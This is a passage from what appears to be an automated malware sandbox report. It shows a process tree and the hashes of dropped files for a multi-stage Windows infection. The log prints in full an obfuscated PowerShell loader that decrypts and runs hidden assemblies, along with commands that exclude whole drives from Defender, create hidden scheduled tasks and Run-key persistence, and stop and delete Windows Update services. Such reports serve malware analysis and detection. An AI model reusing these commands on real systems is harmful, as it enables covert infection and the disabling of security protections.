      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Drops file in Program Files directory

  depth 2: C:\Users\Admin\AppData\Local\Temp\1802.exe
    command line: C:\Users\Admin\AppData\Local\Temp\1802.exe
    - Executes dropped EXE

    depth 3: C:\Users\Admin\AppData\Local\Temp\Player3.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
      - Executes dropped EXE

    depth 3: C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 164 -s 1436
      - Program crash

  depth 2: C:\Users\Admin\AppData\Local\Temp\1F18.exe
    command line: C:\Users\Admin\AppData\Local\Temp\1F18.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection

  depth 2: C:\Users\Admin\AppData\Local\Temp\21D8.exe
    command line: C:\Users\Admin\AppData\Local\Temp\21D8.exe
    - Executes dropped EXE

    depth 3: C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 480
      - Program crash

  depth 2: C:\Users\Admin\AppData\Local\Temp\6AC9.exe
    command line: C:\Users\Admin\AppData\Local\Temp\6AC9.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

  depth 2: C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9B31.bat" "

    depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -w hidden -c #
      - Suspicious use of AdjustPrivilegeToken

    depth 3: C:\Users\Admin\AppData\Local\Temp\9B31.bat.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\9B31.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;
      - Executes dropped EXE
      - Modifies registry class
      - Suspicious use of AdjustPrivilegeToken

      depth 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4896);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        - Suspicious use of AdjustPrivilegeToken

      depth 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
        - Suspicious use of AdjustPrivilegeToken

      depth 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\9B31')

      depth 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_JGAbA' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\JGAbA.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

      depth 4: C:\Windows\SysWOW64\WScript.exe
        command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\JGAbA.vbs"

        depth 5: C:\Windows\SysWOW64\cmd.exe
          command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\JGAbA.bat" "

          depth 6: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            command line: powershell -w hidden -c #

          depth 6: C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe
            command line: "C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;
C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe"C:\Users\Admin\AppData\Roaming\JGAbA.bat.exe" function PX($c){$c.Replace('EOIUi', '')}$UcNH=PX 'GeEOIUitCurEOIUirenEOIUitPrEOIUioceEOIUissEOIUi';$LMam=PX 'REOIUieaEOIUidLEOIUiinEOIUieEOIUisEOIUi';$nIei=PX 'CEOIUihEOIUiangEOIUieEOIUiExteEOIUinEOIUisiEOIUionEOIUi';$GDjp=PX 'InEOIUivokEOIUieEOIUi';$cJOL=PX 'FEOIUiirsEOIUitEOIUi';$bNvC=PX 'EntrEOIUiyPoEOIUiiEOIUintEOIUi';$ZDDe=PX 'FroEOIUimBEOIUiaseEOIUi64SEOIUitrEOIUiingEOIUi';$wEka=PX 'LoaEOIUidEOIUi';$xsru=PX 'CreEOIUiatEOIUieDEOIUiecrEOIUiyEOIUipEOIUitoEOIUirEOIUi';$JaHM=PX 'TrEOIUianEOIUisforEOIUimFEOIUiinEOIUialEOIUiBlEOIUiockEOIUi';function AyMSx($aADFu){$mkeZq=[System.Security.Cryptography.Aes]::Create();$mkeZq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mkeZq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mkeZq.Key=[System.Convert]::$ZDDe('33o4mPrkfBEGS8RPjJSCxTGdyodbZrRhtRuNUH5rzRk=');$mkeZq.IV=[System.Convert]::$ZDDe('Pw0jyFBtnQYUrNsqUX5AOg==');$kgbNu=$mkeZq.$xsru();$gGieg=$kgbNu.$JaHM($aADFu,0,$aADFu.Length);$kgbNu.Dispose();$mkeZq.Dispose();$gGieg;}function QpgTW($aADFu){$lUmJr=New-Object System.IO.MemoryStream(,$aADFu);$vxHfp=New-Object System.IO.MemoryStream;$CEpcv=New-Object System.IO.Compression.GZipStream($lUmJr,[IO.Compression.CompressionMode]::Decompress);$CEpcv.CopyTo($vxHfp);$CEpcv.Dispose();$lUmJr.Dispose();$vxHfp.Dispose();$vxHfp.ToArray();}function jfGQF($aADFu,$OnnHT){[System.Reflection.Assembly]::$wEka([byte[]]$aADFu).$bNvC.$GDjp($null,$OnnHT);}$oEcWz=[System.Linq.Enumerable]::$cJOL([System.IO.File]::$LMam([System.IO.Path]::$nIei([System.Diagnostics.Process]::$UcNH().MainModule.FileName, $null)));$fmJXF = $oEcWz.Substring(3).Split('\');$xAiAZ=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[0])));$AjQdR=QpgTW (AyMSx ([Convert]::$ZDDe($fmJXF[1])));jfGQF $AjQdR $null;jfGQF $xAiAZ $null;6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3136);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\JGAbA')7⤵
-
C:\Users\Admin\AppData\Local\Temp\778030.exe"C:\Users\Admin\AppData\Local\Temp\778030.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\778030.exe"C:\Users\Admin\AppData\Local\Temp\778030.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\778030.exe"C:\Users\Admin\AppData\Local\Temp\778030.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\778030.exe"C:\Users\Admin\AppData\Local\Temp\778030.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000016021\daK.cmd" "8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c #9⤵
-
C:\Users\Admin\AppData\Local\Temp\1000016021\daK.cmd.exe"C:\Users\Admin\AppData\Local\Temp\1000016021\daK.cmd.exe" function Fz($l){$l.Replace('AiBmN', '')}$vloA=Fz 'CreAiBmNateAiBmNDecAiBmNryAiBmNptAiBmNoAiBmNrAiBmN';$niFt=Fz 'LoAiBmNadAiBmN';$Ubgw=Fz 'ChaAiBmNngeAiBmNExAiBmNtenAiBmNsiAiBmNonAiBmN';$TCNm=Fz 'TraAiBmNnsfoAiBmNrmFAiBmNinAiBmNalAiBmNBlAiBmNoAiBmNckAiBmN';$KsKu=Fz 'ReAiBmNaAiBmNdAiBmNLinAiBmNesAiBmN';$gOmL=Fz 'FrAiBmNomAiBmNBaAiBmNsAiBmNeAiBmN64StAiBmNriAiBmNngAiBmN';$CdTj=Fz 'InvAiBmNokeAiBmN';$VkgB=Fz 'FirsAiBmNtAiBmN';$bUDG=Fz 'GeAiBmNtCuAiBmNrrAiBmNenAiBmNtPAiBmNrAiBmNocAiBmNesAiBmNsAiBmN';$CMHm=Fz 'EnAiBmNtrAiBmNyPAiBmNoAiBmNinAiBmNtAiBmN';function VZwrE($IxAst){$OdcJU=[System.Security.Cryptography.Aes]::Create();$OdcJU.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OdcJU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OdcJU.Key=[System.Convert]::$gOmL('tRx60Ue+BsVSsmoXBDDY1e0gF+3mmpb6DEUhsmAbHFA=');$OdcJU.IV=[System.Convert]::$gOmL('0o09sv5yq4yWOVwemrt4fA==');$QGThv=$OdcJU.$vloA();$JmosV=$QGThv.$TCNm($IxAst,0,$IxAst.Length);$QGThv.Dispose();$OdcJU.Dispose();$JmosV;}function cUmcA($IxAst){$DaPTT=New-Object System.IO.MemoryStream(,$IxAst);$bUbZV=New-Object System.IO.MemoryStream;$ixPPp=New-Object System.IO.Compression.GZipStream($DaPTT,[IO.Compression.CompressionMode]::Decompress);$ixPPp.CopyTo($bUbZV);$ixPPp.Dispose();$DaPTT.Dispose();$bUbZV.Dispose();$bUbZV.ToArray();}function HBQCk($IxAst,$yhWuH){[System.Reflection.Assembly]::$niFt([byte[]]$IxAst).$CMHm.$CdTj($null,$yhWuH);}$rGDzs=[System.Linq.Enumerable]::$VkgB([System.IO.File]::$KsKu([System.IO.Path]::$Ubgw([System.Diagnostics.Process]::$bUDG().MainModule.FileName, $null)));$xqJgF = $rGDzs.Substring(3).Split('\');$seypB=cUmcA (VZwrE ([Convert]::$gOmL($xqJgF[0])));$aINzU=cUmcA (VZwrE ([Convert]::$gOmL($xqJgF[1])));HBQCk $aINzU $null;HBQCk $seypB $null;9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1912);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4088);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;7⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Users\Admin\AppData\Local\Temp\CCE0.exeC:\Users\Admin\AppData\Local\Temp\CCE0.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\dllhost.exe"C:\Windows\system32\dllhost.exe"3⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4904" "2316" "2320" "2512" "0" "0" "2468" "0" "0" "0" "0" "0"3⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 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2⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"2⤵
- Creates scheduled task(s)
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
Downloads
-
C:\Program Files\Notepad\Chrome\updater.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
2KB
MD5e5b1cc0ae5af6a8277d75cff4af2c5e8
SHA14768fff3d4bbe02f89683b4a0e7b15b24b54eb9f
SHA256d950c0d748aae641d71b11cd1c519b289917c23bee1a2b6bc5c496fd8e5d4655
SHA51257a4737deeefac0124d73b52525993fecbbebd21a556ece87f8e79e845e07f037abb5e49f7458e8a010935c6691f18fbb913d77ecfb2ba902067788c483ec3d7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EFilesize
1KB
MD53adac03b181d7980568dda0da0efc9de
SHA1a283c4c9bd26a65b8240d21708e57f5946778341
SHA25624c4973ced938b77d9670ac79eb76cd52411b17ab59ec78ba14c1b433f342933
SHA5126fbd2a32fc18606628ea56311764cd879a1196405dddd4d269ad6163b2ffdcf916786f1c0328f27ec089be5cb9b4ecb3542363f4dfb3df1c1b91a0e038b67241
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
488B
MD5875bb33cf942ab8551298b17d559746e
SHA1a8101733fa65473b9ff0532cdfb7cc86d17a636e
SHA256413795736985d605338919da68bf9561c5f1121b75b5be87ea7b522fec655c64
SHA51269307af30e98a761c2e488591138baa1320274a2edf26c69f53e0dfe35fbae80b93d8e46ceacf8eb846aa6481ddcc62287d2f318fa2b8201d3c2d43cd9977dd9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EFilesize
482B
MD5cb12f3edc47d4fc97fc9a32fcce8ac11
SHA10e421b0aa2e7a150f96d0565fee3d1b19a210d57
SHA2562b302045e0c070df6b5c9acfbafb9191981987bceb2fe8fb076f44559a4cc1c7
SHA512b3bec41b314f8e6962786ebf8e199bfb4e49d3518d87a0441f73f3c12a5b850cd7e5239dadf9eb636411284932e57cd2142f3473ce7002bf657a4935885327c6
-
